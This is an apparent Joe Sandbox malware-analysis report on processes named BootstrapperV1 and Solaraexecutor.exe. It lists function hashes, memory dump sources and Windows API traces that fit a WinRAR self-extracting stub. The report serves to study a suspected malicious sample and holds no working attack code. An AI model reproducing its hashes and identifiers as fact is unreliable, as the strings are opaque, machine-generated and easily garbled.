Opcode ID: 4dc968249a743711e2396845f4d17eaa925119952a80ad4956d5f433bef7a606
Instruction ID: 4beb5ca49d08945529a40314ac176fffa44a606a2185a283ff7676f337e86d0c
Opcode Fuzzy Hash: 4dc968249a743711e2396845f4d17eaa925119952a80ad4956d5f433bef7a606
Instruction Fuzzy Hash: 24F0C83190EA8A0FE3669B6884655E47BE1BF09350B0E01F6D488CB1A3D91CE9858761

Function 00007FFD9B7F6FF0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a5dcb7c12523507d85676c04f30f6965e7fea9975f25be0c1ca3ee73bb67e13
Instruction ID: 0f741a87c1b73dfa1d3bb7e25ef567df22e4acdd0a0e796f9ae9a9c3a73d33f5
Opcode Fuzzy Hash: 3a5dcb7c12523507d85676c04f30f6965e7fea9975f25be0c1ca3ee73bb67e13
Instruction Fuzzy Hash: C3E0E512B19D1E0AEAF8B71C64659F937D2DFD8250B410276D40DC32AADC08AD4243C5

Function 00007FFD9B7F0A98 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96d74727d6aef796621ffa3005c491a9197c95bb3b8a48ee8788d7dd676c66f8
Instruction ID: aed904647c945326c1302bc70c7ff7a486bdf747759481ae44ed56445a2f3fb8
Opcode Fuzzy Hash: 96d74727d6aef796621ffa3005c491a9197c95bb3b8a48ee8788d7dd676c66f8
Instruction Fuzzy Hash: C2F0FC30B2AA1A5EE7705764C4586B57BE1EF40361F06417CC44E831F0DE287982C3C8

Function 00007FFD9B806CF5 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f62c4b9e5b757fb9b1df40d57f91b7f26db1eee040f1c4b99510854a126c048a
Instruction ID: 7a4863031085b9ef12ce795698f00e9c91595033b163cd6c8c3a3cdae4a7adc4
Opcode Fuzzy Hash: f62c4b9e5b757fb9b1df40d57f91b7f26db1eee040f1c4b99510854a126c048a
Instruction Fuzzy Hash: D0F0307071890C4FDBD4EF5CC4A5AA933D2EF5C340B0484B9A88DCB26BDE24EC418790

Function 00007FFD9B8024A8 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c06778668429358255191341b602cd5be470178a72ae4526aa65147fa68bbb75
Instruction ID: cddfe3175f89e64f504220e9ffdc9e78722cbc4ac07d6b6ea22dce3d7ede4bf2
Opcode Fuzzy Hash: c06778668429358255191341b602cd5be470178a72ae4526aa65147fa68bbb75
Instruction Fuzzy Hash: 53F0EC3171AD0D0AD6B4B71C6054AFA26D1DFDD360F06013AF48EC33D5DD196D828380

Function 00007FFD9B8171EC Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13b122298869b8d81d5a896900d820312155609938994ada172edd102aab805e
Instruction ID: 3ecd17c2aea5d4c8a144281d5cdab2f368639aa5ac1f95c5f159649fe80cab4d
Opcode Fuzzy Hash: 13b122298869b8d81d5a896900d820312155609938994ada172edd102aab805e
Instruction Fuzzy Hash: 8AF0393270C94D8F8F88EF58E451DEAB3A0FBA832071001A6E00AC7156DA31E852CBC0

Function 00007FFD9B7FDFE0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9befc48bab00db54a46e1604d342ca47031dd10f1ecf90a35c4c86934b7eb6c2
Instruction ID: 4c1b7b29c4703fc0b05dfec635c6da67194dc222a01b3c8fbca8565e5a402793
Opcode Fuzzy Hash: 9befc48bab00db54a46e1604d342ca47031dd10f1ecf90a35c4c86934b7eb6c2
Instruction Fuzzy Hash: 49E08631F2E81D4FDAB4EB5C5454AB577E1EF0C78170504E6E49EC72E5D5015D0883C1

Function 00007FFD9B80ED71 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d68c01f0991485788b344df86ea4d3f7018eb2af444ad2e0bd1e2226c6e38e9
Instruction ID: f5c4f0b00c8c57aacc4ae5e43421187796e17d6e5ab0f55e81e8cc3d2550d8b5
Opcode Fuzzy Hash: 4d68c01f0991485788b344df86ea4d3f7018eb2af444ad2e0bd1e2226c6e38e9
Instruction Fuzzy Hash: C9E0D831B0850E4FE738D748D4A05F53352EF99361F15467BC84AC66E4DD18E5414340

Function 00007FFD9B801990 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8a1c75c644064a509f5ca1f677802aa021618f6bc013385a9d3a3dc67d64598
Instruction ID: e7a8c4018f0580a156384131ac0c5a8b393d3f60142c71c56ad7ca5316688b00
Opcode Fuzzy Hash: d8a1c75c644064a509f5ca1f677802aa021618f6bc013385a9d3a3dc67d64598
Instruction Fuzzy Hash: 7DE02B21F0FD0E07EE9CBA755CB615031D1FFEE254BDA00A9E44CC2192FD8AD9928341

Function 00007FFD9B7FDCA0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cca6a045a2016ba5872aaa34ec87e2239bb3894ffdc4b070874e98f81ff5de0d
Instruction ID: 508259afd14e4e6ff43b4df64923f85870c6d3b17cf829d69942d500c6edc8eb
Opcode Fuzzy Hash: cca6a045a2016ba5872aaa34ec87e2239bb3894ffdc4b070874e98f81ff5de0d
Instruction Fuzzy Hash: 3CD05E11F1BE2E1AD4B4736C28352A92C82DF8C620B4A0772E80CC32BDEC489E8142C9

Function 00007FFD9B7FFF48 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e9609f414b2c6dee6a9b60682e59ddfd1caf386be40e54ae2b86e41f9fbf4b
Instruction ID: cce21eee2bb98f696b0eede8534dc700f26e92e67beaba74c8fa27c61f96f7f7
Opcode Fuzzy Hash: a6e9609f414b2c6dee6a9b60682e59ddfd1caf386be40e54ae2b86e41f9fbf4b
Instruction Fuzzy Hash: 4DE0C220A1AA4A07F714BB724C450BA71D1BF8C285FC54B76D8CCD10A0FA2CC3C84242

Function 00007FFD9B800757 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22203e6378f4f5bc4a1937834fb2dbca02914a6ecd08eb00ea1aeca88438a138
Instruction ID: e83020dac23bee372c4a50ad43952cc0a1e984c201cd965bf0e90ac94ef82c35
Opcode Fuzzy Hash: 22203e6378f4f5bc4a1937834fb2dbca02914a6ecd08eb00ea1aeca88438a138
Instruction Fuzzy Hash: C2D0A701B19D1D0BA2D5AA9C74915F96281DBD81213400677C00AC228ECC1958460341

Function 00007FFD9B808810 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28cfcb10db7feb2279e5b8633e552c7b9afe1379b42a5352a7b385fe40ab022e
Instruction ID: e6ab7d3086092b6699877e88b5d1fb9f81b94520a8cc8c984d66a6b7b0048645
Opcode Fuzzy Hash: 28cfcb10db7feb2279e5b8633e552c7b9afe1379b42a5352a7b385fe40ab022e
Instruction Fuzzy Hash: 2AE0B66154F78A5FCA92BBB885660C97BE15F0A6A071944EAE588DF0E3E55C488E8302

Function 00007FFD9B7FFF58 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e540e96d9286f58e919a74015f00a8b9263bf3238548727e73af104b210a6c5
Instruction ID: bb813d3ca483c7233fbce918451b08d5bd5ae2de4937d0992b2e77a2c4b96b94
Opcode Fuzzy Hash: 3e540e96d9286f58e919a74015f00a8b9263bf3238548727e73af104b210a6c5
Instruction Fuzzy Hash: 2CD02B30B1CD1C09EB60BB6850246F923C0CF48394F050537FC4CD21B0ED485A8102C1

Function 00007FFD9B810CF9 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0628c9a6ccba27a66c3e05b125a7171081aeecfdfdfdc06c4e2b73aea6f90a33
Instruction ID: dbf17aee41df13649000d74ac1a3b4548d21daa296b89445f3f24bef9afbff73
Opcode Fuzzy Hash: 0628c9a6ccba27a66c3e05b125a7171081aeecfdfdfdc06c4e2b73aea6f90a33
Instruction Fuzzy Hash: 00D02B3061E91D0FDAB4DB5D94949603BE0FF0CB0030511DAC48CC7261D844AC814381

Function 00007FFD9B7FFEC8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 956b379a9c9eba88aae593d2b292596b9b3d23302e7bd1dbe9a19494cacac553
Instruction ID: 0de11dca2d271bfbe8b2f5cc69121f2868f1d171491a86a17de41572879cbad1
Opcode Fuzzy Hash: 956b379a9c9eba88aae593d2b292596b9b3d23302e7bd1dbe9a19494cacac553
Instruction Fuzzy Hash: 60D0A762A1F84C1AE174A36C0C1C6760886CFCD2D0B5B02B9B46CC31A5EC046D810291

Function 00007FFD9B810E46 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d41566ec289db0c9c0e1236429250594f18be49c0d52a3a30b65739f4429f1c
Instruction ID: 65f067e5744b81f773dc802c21c1da80f858958e69e00589562066bef4bc49f3
Opcode Fuzzy Hash: 5d41566ec289db0c9c0e1236429250594f18be49c0d52a3a30b65739f4429f1c
Instruction Fuzzy Hash: ABE08C30B2EA1E46E1709FA540213B97182FF48700F119A34D0AEC26E2DD3D72815790

Function 00007FFD9B7F6F88 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db180de371f70acc9d829c5e8c873bd2cf533cc1e6a63e32f23742b7c91eeca
Instruction ID: 01b71e606ef4baee4ae299c9360bef930878c747e887d28a2811cbdaa19d5cd2
Opcode Fuzzy Hash: 2db180de371f70acc9d829c5e8c873bd2cf533cc1e6a63e32f23742b7c91eeca
Instruction Fuzzy Hash: 07D0237075B54A0FD3016FF808392A47EE0DF4511074404FFC485CB177C85C04864311

Function 00007FFD9B8019E3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f688d638c1f5b977826098eaa32055b4d9754f7597d539e3631f0a58a46d14e9
Instruction ID: 7a9fe5e2d434854e368c55e8fad44301261c1be4a29ed2332f39596f7f00568a
Opcode Fuzzy Hash: f688d638c1f5b977826098eaa32055b4d9754f7597d539e3631f0a58a46d14e9
Instruction Fuzzy Hash: E8D05E306092444FCB58AE28A090C80B790EF1220835509E8E0144B1E7C52ADC86CB01

Function 00007FFD9B80C84D Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 993b69e6f1810c3b766d4200a47cde8246ab241977de7514772b2c481835660e
Instruction ID: a384f39bcefce4e79a879c3b0850d664186ac9c49930f04f195bcb261b1263aa
Opcode Fuzzy Hash: 993b69e6f1810c3b766d4200a47cde8246ab241977de7514772b2c481835660e
Instruction Fuzzy Hash: A0B09B62E19B4D0BD291DA4C145815116C3D7D8145B05821A54C9C1264DD1555015740

Function 00007FFD9B7F0A40 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43e9e5c663ce5376ce48f46a323b3163d0044c5afe494ba13e5debf6146c2b34
Instruction ID: bf6d8328ec215c6404ba6072cba6c8ebc3570ee508f299d5bc18ad36efddb76c
Opcode Fuzzy Hash: 43e9e5c663ce5376ce48f46a323b3163d0044c5afe494ba13e5debf6146c2b34
Instruction Fuzzy Hash:

Non-executed Functions

Function 00007FFD9B7FDA75 Relevance: .4, Instructions: 368COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53e23e80ffdc7a54e3cbbede6c5f9fbe66862b06c681135ee5d99b9d06674da9
Instruction ID: 6985cab0b0251216ad0441c62cccbfd354fa707d409cb2dd7cbf74b61fa520c4
Opcode Fuzzy Hash: 53e23e80ffdc7a54e3cbbede6c5f9fbe66862b06c681135ee5d99b9d06674da9
Instruction Fuzzy Hash: EBC1AD37B087954AC31EFA6CF4A64F8FB60FF80362704467BC1499A0B6CA25619AC7D0

Analysis Process: Solaraexecutor.exePID: 6496, Parent PID: 7092COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.1%
Total number of Nodes:	1481
Total number of Limit Nodes:	45

Executed Functions

Function 00D3DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D30863: GetModuleHandleW.KERNEL32(kernel32), ref: 00D3087C
Part of subcall function 00D30863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D3088E
Part of subcall function 00D30863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D308BF

Part of subcall function 00D3A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00D3A655

Part of subcall function 00D3AC16: OleInitialize.OLE32(00000000), ref: 00D3AC2F
Part of subcall function 00D3AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D3AC66
Part of subcall function 00D3AC16: SHGetMalloc.SHELL32(00D68438), ref: 00D3AC70

GetCommandLineW.KERNEL32 ref: 00D3DF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00D3DF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00D3DF94
UnmapViewOfFile.KERNEL32(00000000), ref: 00D3DFCE

Part of subcall function 00D3DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D3DBF4
Part of subcall function 00D3DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D3DC30

CloseHandle.KERNEL32(00000000), ref: 00D3DFD7
GetModuleFileNameW.KERNEL32(00000000,00D7EC90,00000800), ref: 00D3DFF2
SetEnvironmentVariableW.KERNEL32(sfxname,00D7EC90), ref: 00D3DFFE
GetLocalTime.KERNEL32(?), ref: 00D3E009
_swprintf.LIBCMT ref: 00D3E048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00D3E05A
GetModuleHandleW.KERNEL32(00000000), ref: 00D3E061
LoadIconW.USER32(00000000,00000064), ref: 00D3E078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00D3E0C9
Sleep.KERNEL32(?), ref: 00D3E0F7
DeleteObject.GDI32 ref: 00D3E130
DeleteObject.GDI32(?), ref: 00D3E140
CloseHandle.KERNEL32 ref: 00D3E183

Strings

%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00D3E039
C:\Users\user\Desktop, xrefs: 00D3DF33
sfxname, xrefs: 00D3DFF9
sfxstime, xrefs: 00D3E055
STARTDLG, xrefs: 00D3E0BE
winrarsfxmappingfile.tmp, xrefs: 00D3DF77

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-3743209390
Opcode ID: 18b7fb7fb835cc0db4c282a6b2b735d68a28cd2db81c97b7c3d7da2c6be75e61
Instruction ID: 7f1750e5ad331f0bca3ebf6e578ee08fa72e9cd201941b99d24afdf3ebc1ed11
Opcode Fuzzy Hash: 18b7fb7fb835cc0db4c282a6b2b735d68a28cd2db81c97b7c3d7da2c6be75e61
Instruction Fuzzy Hash: F261E271904345AFD321AF74AC49F2B7BADEB08741F040429F949D23D1EBB49948CBB2

Function 00D3A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00D3B73D,00000066), ref: 00D3A6D5
SizeofResource.KERNEL32(00000000,?,?,?,00D3B73D,00000066), ref: 00D3A6EC
LoadResource.KERNEL32(00000000,?,?,?,00D3B73D,00000066), ref: 00D3A703
LockResource.KERNEL32(00000000,?,?,?,00D3B73D,00000066), ref: 00D3A712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D3B73D,00000066), ref: 00D3A72D
GlobalLock.KERNEL32(00000000), ref: 00D3A73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00D3A762
GlobalUnlock.KERNEL32(00000000), ref: 00D3A7C6

Part of subcall function 00D3A626: GdipAlloc.GDIPLUS(00000010), ref: 00D3A62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D3A7A7
GlobalFree.KERNEL32(00000000), ref: 00D3A7CD

Strings

PNG, xrefs: 00D3A6C6

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: f847c44e3107ab960203a091755a292ccbac6d72493c833544969449e9c6f34f
Instruction ID: 30a44955d31dbe51a2f7c1ff8e7c7a9ca975d7112c24681b51f3aa9881867214
Opcode Fuzzy Hash: f847c44e3107ab960203a091755a292ccbac6d72493c833544969449e9c6f34f
Instruction Fuzzy Hash: 9B316DB5601702AFD7119F25EC88D1BBBA9EF847A2F080519F845C2760EB71D9449AB1

Function 00D2A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D2A592,000000FF,?,?), ref: 00D2A6C4

Part of subcall function 00D2BB03: _wcslen.LIBCMT ref: 00D2BB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00D2A592,000000FF,?,?), ref: 00D2A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D2A592,000000FF,?,?), ref: 00D2A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,00D2A592,000000FF,?,?), ref: 00D2A728
GetLastError.KERNEL32(?,?,?,?,00D2A592,000000FF,?,?), ref: 00D2A734

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: f4c44c3e480cd433c0f4d00953f88095caeaa46707afbb4e7670bc8e527d98f1
Instruction ID: a71e373bc3de00dce1e96056e098e2d6e4dcc79bff3941e65f2eab9884db7af3
Opcode Fuzzy Hash: f4c44c3e480cd433c0f4d00953f88095caeaa46707afbb4e7670bc8e527d98f1
Instruction Fuzzy Hash: B741B432500225ABC715DF68DC84AE9F7B8FB58354F044196E95DD3240D7346E90CFB4

Function 00D47DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00D47DC4,00000000,00D5C300,0000000C,00D47F1B,00000000,00000002,00000000), ref: 00D47E0F
TerminateProcess.KERNEL32(00000000,?,00D47DC4,00000000,00D5C300,0000000C,00D47F1B,00000000,00000002,00000000), ref: 00D47E16
ExitProcess.KERNEL32 ref: 00D47E28

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: c91f3d4658b72f5ad9a83b699c74126a286410a273809e377f69e16b53f2c919
Instruction ID: 3ee3b1170317335d3bb5ea3b0ac7277927f3304cc20b4f6a60e1bdaff4de8606
Opcode Fuzzy Hash: c91f3d4658b72f5ad9a83b699c74126a286410a273809e377f69e16b53f2c919
Instruction Fuzzy Hash: 08E0B631004748ABCF126F65DD09A4A7F6AEB50392B044564FC19CB272CB36DE56DBB0

Function 00D2848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D28493

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
